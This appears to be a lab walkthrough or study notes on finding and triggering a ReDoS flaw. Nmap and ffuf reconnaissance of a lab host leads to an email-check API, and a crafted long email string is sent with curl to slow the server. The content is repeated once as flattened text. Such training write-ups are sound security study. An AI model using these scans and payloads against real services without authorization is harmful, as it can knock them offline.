DISCOVERY

root@oco:~$ sudo nmap -sC -sV -T4 10.129.202.133 -p-
 PORT     STATE SERVICE VERSION
 3000/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title.
 3001/tcp open  http    PHP cli server 5.5 or later
 |_http-title: Login
 3002/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title.
 3003/tcp open  http    PHP cli server 5.5 or later (PHP 7.4.3)

root@oco:~$ sudo nmap --script=vuln -T4 10.129.202.133 -p 3000-3003
 PORT     STATE SERVICE
 3000/tcp open  ppp
 3001/tcp open  nessus
 3002/tcp open  exlm-agent
 3003/tcp open  cgms

root@oco:~$ find / -iname directory-list*
 /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
 
root@oco:~$ cp /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt .
root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://{targetSite.tld}:{port}/FUZZ -t 100 -ic
 api                     [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 14ms]
 API                     [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 9ms]

 * -w specifies the wordlist
 * -u specifies the url
 * -t increases the number of threads
 * -ic removes commented lines from the file
    - ignore wordlist comments (default: false)
    
root@oco:~$ curl http://10.129.202.133:3000/api
 {"status":"UP"}
 
 * try this on Kibana
 
#perform API endpoint fuzzing common-api-endpoints-mazen160.txt list
root@oco:~$ find / -iname common-api* 2>/dev/null
 /usr/share/seclists/Discovery/Web-Content/common-api-endpoints-mazen160.txt

root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/common-api-endpoints-mazen160.txt .
root@oco:~$ ffuf -w common-api-endpoints-mazen160.txt -u 'http://{targetSite:port}/api/FUZZ' -t 100 -ic
 check-email                [Status: 200, Size: 71, Words: 5, Lines: 1, Duration: 27ms]

#identify parameter via ffuf fuzzing
root@oco:~$ ...


#test response time
root@oco:~$ curl "http://<TARGET IP>:3000/api/check-email?email=test_value"
 {"regex":"/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/","success":false}

#craft the payload
root@oco:~$ echo -n "jjjjjjjjjjjjjjjjjjjjjjjjjjjj@ccccccccccccccccccccccccccccc.55555555555555555555555555555555555555555555555555555555."

#observe time difference
root@oco:~$ curl "http://10.129.202.133:3000/api/check-email?email=jjjjjjjjjjjjjjjjjjjjjjjjjjjj@ccccccccccccccccccccccccccccc.55555555555555555555555555555555555555555555555555555555."
 {"regex":"/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/","success":false}

 * notice that the API takes several seconds to respond and that longer payloads 
   increase the evaluation time
    - The difference in response time between the first cURL command and the 
      second is significant which can lead to a ReDoS attack

PreviousREDOS NextTIMING ATTACKS

Last updated 25 days ago

root@oco:~$ sudo nmap -sC -sV -T4 10.129.202.133 -p- PORT STATE SERVICE VERSION 3000/tcp open http Node.js Express framework |_http-title: Site doesn't have a title. 3001/tcp open http PHP cli server 5.5 or later |_http-title: Login 3002/tcp open http Node.js Express framework |_http-title: Site doesn't have a title. 3003/tcp open http PHP cli server 5.5 or later (PHP 7.4.3) root@oco:~$ sudo nmap --script=vuln -T4 10.129.202.133 -p 3000-3003 PORT STATE SERVICE 3000/tcp open ppp 3001/tcp open nessus 3002/tcp open exlm-agent 3003/tcp open cgms root@oco:~$ find / -iname directory-list* /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt root@oco:~$ cp /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt . root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://{targetSite.tld}:{port}/FUZZ -t 100 -ic api [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 14ms] API [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 9ms] * -w specifies the wordlist * -u specifies the url * -t increases the number of threads * -ic removes commented lines from the file - ignore wordlist comments (default: false) root@oco:~$ curl http://10.129.202.133:3000/api {"status":"UP"} * try this on Kibana #perform API endpoint fuzzing common-api-endpoints-mazen160.txt list root@oco:~$ find / -iname common-api* 2>/dev/null /usr/share/seclists/Discovery/Web-Content/common-api-endpoints-mazen160.txt root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/common-api-endpoints-mazen160.txt . root@oco:~$ ffuf -w common-api-endpoints-mazen160.txt -u 'http://{targetSite:port}/api/FUZZ' -t 100 -ic check-email [Status: 200, Size: 71, Words: 5, Lines: 1, Duration: 27ms] #identify parameter via ffuf fuzzing root@oco:~$ ... #test response time root@oco:~$ curl "http://<TARGET IP>:3000/api/check-email?email=test_value" {"regex":"/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/","success":false} #craft the payload root@oco:~$ echo -n "jjjjjjjjjjjjjjjjjjjjjjjjjjjj@ccccccccccccccccccccccccccccc.55555555555555555555555555555555555555555555555555555555." #observe time difference root@oco:~$ curl "http://10.129.202.133:3000/api/check-email?email=jjjjjjjjjjjjjjjjjjjjjjjjjjjj@ccccccccccccccccccccccccccccc.55555555555555555555555555555555555555555555555555555555." {"regex":"/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/","success":false} * notice that the API takes several seconds to respond and that longer payloads increase the evaluation time - The difference in response time between the first cURL command and the second is significant which can lead to a ReDoS attack